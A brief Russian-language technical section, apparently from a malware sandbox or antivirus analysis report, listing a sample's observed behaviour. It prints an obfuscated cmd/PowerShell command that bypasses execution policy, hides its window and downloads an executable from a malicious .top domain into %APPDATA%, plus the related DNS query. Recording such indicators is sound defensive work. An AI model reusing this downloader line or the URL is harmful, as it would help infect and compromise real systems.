Техническая информация
- http://www.freeflamec.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWeRShElL.EXE -exeCutiOnpoliCY bYpAsS -nOPrOfile -WInDOWStYLE HidDEn (New-ObjECT syStem.nEt.webCliENt).dOwNLoaDFILe('http://www.freeflamec.top/read.php?f=1.gif','%APPdAtA%.eXe');ST...
- DNS ASK fr###lamec.top
- '<SYSTEM32>\cmd.exe' /C "PoWeRShElL.EXE -exeCutiOnpoliCY bYpAsS -nOPrOfile -WInDOWStYLE HidDEn (New-ObjECT syStem.nEt.webCliENt).dOwNLoaDFILe('http://www.freeflamec.top/read.php?f=1.gif','%APPdAtA%.eXe');ST...' (со скрытым окном)